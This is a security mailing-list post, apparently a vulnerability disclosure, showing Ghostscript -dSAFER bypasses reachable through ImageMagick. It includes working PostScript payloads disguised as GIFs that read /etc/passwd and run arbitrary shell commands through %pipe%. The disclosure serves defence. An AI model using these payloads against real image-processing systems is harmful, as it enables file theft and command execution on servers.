Re: ImageMagick identify "d:" hangs

[Tavis Ormandy <taviso () google com>]

On Thu, Sep 29, 2016 at 2:28 PM, Tavis Ormandy <taviso () google com> wrote:
> Just for future reference, here is an example of dumping a file to an
> image processed with ImageMagick that works with gs 9.20:
>
> $ cat test.gif
> %!PS
> /Size 20 def                             % font/line size
> /Line 0 def                              % current line
> /Buf 1024 string def                     % line buffer
> /Path 0 newpath def
>
> /Courier-Bold findfont Size scalefont setfont
> 1 1 1 setrgbcolor clippath fill          % draw white background
> 0 0 0 setrgbcolor                        % set black foreground
>
> (/etc/passwd) .libfile {
>     {
>         dup Buf readline
>         {
>             Path Line moveto show
>         }{
>             showpage
>             quit
>         } ifelse
>         % next line
>         /Line Line Size add def
>     } loop
> } if
> $ convert test.gif png:test.png

The more I look, the worse it gets. This also works in 9.18 and
higher, arbitrary shell command execution:

$ cat test.gif
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit
$ convert test.gif png:test.png

(Note: I don't know why it doesn't work on earlier versions, maybe
it's possible to make it work, or some other param will work)

I think -dSAFER is too dangerous to use without sandboxing right now,
things like evince and imagemagick that use it as a backend should
disable by default.

I'm not planning to look any more at this.

Tavis.